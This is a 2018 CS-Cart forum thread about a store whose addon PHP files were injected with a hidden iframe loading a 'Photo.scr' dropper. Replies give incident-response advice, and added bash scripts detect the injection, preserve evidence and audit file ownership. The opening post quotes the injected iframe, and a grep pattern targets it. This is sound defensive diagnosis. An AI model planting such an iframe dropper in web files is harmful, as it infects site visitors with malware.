
My Store Was Hacked!

 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 01:46 AM #1

Hey all, 

 

I was a victim of an attacker although my store is still in the development stage. 

 

While I was trying to access my web store, a PHP parse error was displayed pointing to a file with a syntax error. It had been recently modified, and I saw an iframe inside it. It is an init.php file belonging to one of the 3rd-party addons. Then I realized that all PHP files for the 2 addons that I have are infected (btw, these addons belong to the same developer). This is the injected code: 

<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>

Appended to the end of each PHP file of the 2 addons. In the same directory, I can see that Photo.scr is there with admin as the owner (file size is around 2 MB).

 

I am using the latest version of Multi-Vendor. Also, my web server is updated. The following security configurations are also applied: 

 

Firewall

SSL/TLS

No password login allowed (only SSH).

Restricted IPs to some directories. 

 

How do you think the attacker succeeded in uploading and changing PHP files? 

What are the possible vulnerabilities that the attacker was able to exploit? I am sure this is not related to server login. 

I always thought that a server with a good configuration and complex passwords would never be compromised. Is this not correct? Is it true that any store can be hacked by an experienced hacker regardless of the security procedures applied? 

 

Thank you for your contributions to this, so that all of us can enjoy secure CS-Cart/Multi-Vendor stores. 
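As an added example (not code from the original post or from CS-Cart), here is a first-pass triage script for exactly the symptoms described above: PHP files with an `<iframe src=Photo.scr ...>` block appended at the end, and a `Photo.scr` dropper sitting beside them. The web root path, the 48-hour "recently changed" window, the two-line shape of the injection, and the fixture files are assumptions for the demonstration; it uses GNU find/grep/sed.

```shell
#!/usr/bin/env bash
# Added example (not from the thread): triage a web root for the injection
# described in the post: an <iframe src=Photo.scr ...> block appended to PHP
# files and a Photo.scr dropper beside them. Paths, the 48-hour window and
# the two-line form of the injection are assumptions.
set -u

# Print every *.php file that contains the injected iframe, sorted.
find_injected_php() {
    local root="$1"
    # -I skips binary files; the pattern is anchored on the tokens quoted in the post.
    grep -rlI --include='*.php' -e '<iframe src=Photo\.scr' -- "$root" | sort
}

# Print dropped Windows executables (Photo.scr in the post's case), sorted.
find_droppers() {
    local root="$1"
    find "$root" -type f \( -iname '*.scr' -o -iname '*.exe' \) | sort
}

# Files changed in the last N minutes (default 48 h), with mtime and owner,
# newest first. The owner column is what later points at the compromised account.
recent_changes() {
    local root="$1" minutes="${2:-2880}"
    find "$root" -type f -mmin "-$minutes" -printf '%TY-%Tm-%Td %TH:%TM %u %p\n' | sort -r
}

# Remove the appended iframe block from one PHP file, keeping a .bak copy.
# Assumes the two-line form quoted in the post (open tag, then </iframe>).
# Only do this after the evidence has been preserved.
strip_iframe() {
    local f="$1"
    cp -p -- "$f" "$f.bak"
    # Delete from the injected open tag through the closing </iframe> line.
    sed -i -e '/<iframe src=Photo\.scr/,/<\/iframe>/d' -- "$f"
}
```

Typical use on the host is `find_injected_php /var/www/html`, `find_droppers /var/www/html` and `recent_changes /var/www/html`, comparing the owner column of the recently changed files against who is supposed to own the addon directories.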



 
  • kogi
  • Senior Member
  • Members
  • Join Date: 16-Aug 07
  • 596 posts

Posted 08 June 2018 - 02:46 AM #2

You might need to find someone who knows what they are doing to check out your server.

 

Because in most cases you just have to look through the log files to see how they got in.



 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 556 posts

Posted 08 June 2018 - 04:36 AM #3

Delete all files, re-upload the CS-Cart files to the server (or make a fresh installation), and check the database for suspicious entries. If that is ok, install and configure the OWASP ModSecurity Core Rule Set or the COMODO ModSecurity Apache Rule Set on the server. This will provide you with real-time protection against many common attack categories, including SQL injection, cross-site scripting (XSS) attacks, file inclusion, etc.




 

Posted 08 June 2018 - 05:56 AM #4

Hello!

 

It will also be wise to backup the hacked version of CS-Cart to be able to follow the trace during the investigation. If you just delete and reinstall, the problem will not be revealed and the store will be breached again in the future.

 

So, save the evidence first, then reinstall.


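The "save the evidence first, then reinstall" advice above, together with the earlier point about reading the log files, as an added example that is not part of the original posts: freeze the compromised tree with its ownership, modes and mtimes intact, record a SHA-256 manifest so a later investigator can prove nothing was altered, and copy the server logs alongside. The web root, case directory and log locations are assumptions; it relies on GNU tar, find, xargs and sha256sum.

```shell
#!/usr/bin/env bash
# Added example, not from the thread: preserve a compromised web root before
# reinstalling. Paths are assumptions; the tree itself is never modified.
set -u

# preserve_evidence <webroot> <destdir> [logdir...]
# Prints the created case directory on success.
preserve_evidence() {
    local webroot="$1" dest="$2"; shift 2
    local stamp; stamp=$(date -u +%Y%m%dT%H%M%SZ)
    local case_dir="$dest/case-$stamp"
    mkdir -p "$case_dir/logs"

    # Hash every file first; the manifest is what proves the copy is faithful.
    ( cd "$webroot" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) \
        > "$case_dir/manifest.sha256"

    # tar records mode, owner and mtime by default; --numeric-owner keeps the
    # uid/gid numerically so they survive even if accounts are recreated on a
    # rebuilt host (the "which account owned the files" question in this thread).
    tar --numeric-owner -czf "$case_dir/webroot.tgz" \
        -C "$(dirname "$webroot")" "$(basename "$webroot")"

    # Logs are the "how did they get in" part: copy them, do not move them.
    local d
    for d in "$@"; do
        [ -d "$d" ] && cp -a -- "$d" "$case_dir/logs/"
    done

    # Hash the archive too, then make the whole case directory read-only.
    sha256sum "$case_dir/webroot.tgz" > "$case_dir/webroot.tgz.sha256"
    chmod -R a-w "$case_dir"
    echo "$case_dir"
}

# verify_manifest <webroot> <manifest>: succeeds only if every hash still matches.
verify_manifest() {
    local webroot="$1" manifest="$2"
    ( cd "$webroot" && sha256sum --quiet -c "$manifest" )
}
```

Run `preserve_evidence /var/www/html /root/evidence /var/log/apache2 /var/log` (as root, so every file is readable) before touching anything; `verify_manifest` on the extracted archive later confirms the copy is the one that was taken.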


 
  • eComLabs
  • CS-Cart Expert
  • Authorized Reseller
  • Join Date: 27-Jan 14
  • 18498 posts

Posted 08 June 2018 - 06:15 AM #5

What Multi-Vendor version do you use?




 
  • Darius
  • Douchebag
  • Members
  • Join Date: 20-Apr 08
  • 3221 posts

Posted 08 June 2018 - 06:31 AM #6

Maybe it was not your site but your PC that was infected first, where you have an FTP client with stored passwords.



 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 11:57 AM #7

Delete all files, re-upload the CS-Cart files to the server (or make a fresh installation), and check the database for suspicious entries. If that is ok, install and configure the OWASP ModSecurity Core Rule Set or the COMODO ModSecurity Apache Rule Set on the server. This will provide you with real-time protection against many common attack categories, including SQL injection, cross-site scripting (XSS) attacks, file inclusion, etc.

Thank you Martfox, will read about your recommendations. 

 

Hello!

 

It will also be wise to backup the hacked version of CS-Cart to be able to follow the trace during the investigation. If you just delete and reinstall, the problem will not be revealed and the store will be breached again in the future.

 

So, save the evidence first, then reinstall.

 

So I did, Maksim.

 

What Multi-Vendor version do you use?

 

I am using 4.7.3. 

 

Maybe it was not your site but your PC that was infected first, where you have an FTP client with stored passwords.

 

I am thinking of this as well. 

 

 

I will keep you updated if any vulnerability or server flaw is found. 



 
  • Darius
  • Douchebag
  • Members
  • Join Date: 20-Apr 08
  • 3221 posts

Posted 08 June 2018 - 12:21 PM #8

This has happened to me; I was using the FileZilla FTP client.

 

I am thinking of this as well.



 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 12:27 PM #9

This has happened to me; I was using the FileZilla FTP client.

 

I never used FTP with a password to connect to my store. I used to use FileZilla over SFTP with SSH keys. Moreover, I disallowed password authentication. Only SSH key pair login is allowed. 

 

But I store the private keys on my machine. A copy of local.config.php is also on my machine. So this scenario is worth investigating. 



 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11023 posts

Posted 08 June 2018 - 05:36 PM #10

If the infection is in only 1 developer's addons, you might check the archive source to see if perchance it was distributed with the malicious code (i.e. the developer was hacked). I'm assuming you have privately contacted the developer to advise them of the issue just in case it's a problem on their end. Either way, the developer should be notified just in case there is some vulnerability in what they distributed (either the injected code itself or some other vulnerability).




 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 17 June 2018 - 01:03 AM #11

Hi, 

 

Just for your info... my server was compromised because of a bad server configuration related to our FTP accounts. We made a mistake during server setup. The reason why the files of certain addons were hacked is that those third-party addons' files were owned by the account which was hacked. This enabled the attacker to change only those files. 

 

Thank you all for your input. Special thanks to Simtech DevOps team for their contribution. 



 
  • mokeshop
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 990 posts

Posted 17 June 2018 - 10:40 AM #12

Addons must go through some kind of validation process before publication on the marketplace.



 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11023 posts

Posted 17 June 2018 - 07:14 PM #13

Addons must go through some kind of validation process before publication on the marketplace.

Why? This had nothing to do with the addons themselves. If the addon archives had been extracted/installed via the '+' icon in CS-Cart rather than being uploaded via FTP, none of those issues would have happened. Additionally, the description also implies that the practice used would create ownership issues on the site anyway, which (depending on what the addon needs to do) could also break that addon. 


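The root cause reported in this thread and the ownership point made just above (addon files owned by a separate FTP account were exactly the files the attacker could change) suggest a check worth running on any web root. The following is an added example, not code from the original posts or from CS-Cart: it lists every file or directory not owned by the expected user and everything writable by "other", and tightens the modes. The web root, the expected owner and the fixture tree are assumptions; it needs GNU find.

```shell
#!/usr/bin/env bash
# Added example, not from the thread: audit ownership and world-writability
# under a web root. Paths and the expected owner are assumptions.
set -u

# audit_ownership <webroot> <expected_owner>
# Prints one line per finding:
#   "wrong-owner <user> <path>"  or  "world-writable <mode> <path>"
# No output means nothing was found.
audit_ownership() {
    local root="$1" owner="$2"
    local tab; tab=$(printf '\t')
    # %u = owner, %m = octal mode (e.g. 644), %p = path; tab-separated so
    # paths containing spaces survive the awk split.
    find "$root" \( -type f -o -type d \) -printf '%u\t%m\t%p\n' \
        | awk -F "$tab" -v want="$owner" '
            $1 != want     { print "wrong-owner " $1 " " $3 }
            $2 ~ /[2367]$/ { print "world-writable " $2 " " $3 }' \
        | sort
}

# harden_permissions <webroot>: directories 755, files 644, so nothing is
# writable by "other". Changing the owner itself (chown) needs root and the
# right target user for your deployment, so it is left to the operator;
# files holding credentials (the thread mentions local.config.php) should be
# tightened separately according to which user PHP runs as.
harden_permissions() {
    local root="$1"
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
}
```

`audit_ownership /var/www/html www-data` (or whichever single account is meant to own the tree) shows at a glance which files a second, FTP-only account could have written; an empty result after `harden_permissions` and the appropriate `chown -R` is the state to aim for.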


 
  • mokeshop
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 990 posts

Posted 17 June 2018 - 08:36 PM #14

Why? This had nothing to do with the addons themselves. If the addon archives had been extracted/installed via the '+' icon in CS-Cart rather than being uploaded via FTP, none of those issues would have happened. Additionally, the description also implies that the practice used would create ownership issues on the site anyway, which (depending on what the addon needs to do) could also break that addon. 

 

I was talking about a verification system for addons like they have on Presta... the module has to be tested and verified... here addons are distributed without verification. You can put anything inside an addon.



 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 556 posts

Posted 17 June 2018 - 08:46 PM #15

I was talking about a verification system for addons like they have on Presta... the module has to be tested and verified... here addons are distributed without verification. You can put anything inside an addon.

 

That's another story and has nothing to do with the OP's issue in this thread.

